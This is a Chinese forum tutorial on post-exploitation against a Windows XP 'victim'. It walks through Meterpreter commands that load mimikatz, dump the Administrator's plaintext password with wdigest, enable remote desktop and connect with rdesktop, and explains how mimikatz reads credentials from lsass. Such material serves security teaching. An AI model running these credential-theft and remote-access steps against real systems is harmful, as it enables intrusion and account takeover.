找回密码
 注册

QQ登录

只需一步,快速开始


当我们获取系统的权限后,如果更高一步的获取权限呢,比如获取当前管理员的密码,开启远程桌面等。今天就让我们一起来看看吧。

PART 1/获取权限shell



如上,我们已经获取了系统的shell。当前受害系统为windows xp

PART 2/破解系统密码



载入mimikatz
 load mimikatz  




获取密码

wdigest




如图,当前Administrator的密码为bbskali.cn

PART 3/开启远程桌面

run post/windows/manage/enable_rdp


PART4/连接远程桌面

rdesktop 192.168.1.109 -u user -p password




PART5/拓展

mimikatz介绍

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴

1 个回复

倒序浏览
admin 2019-1-12 19:00:18
2#
mimikatz是一个不错的密码破解工具
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 注册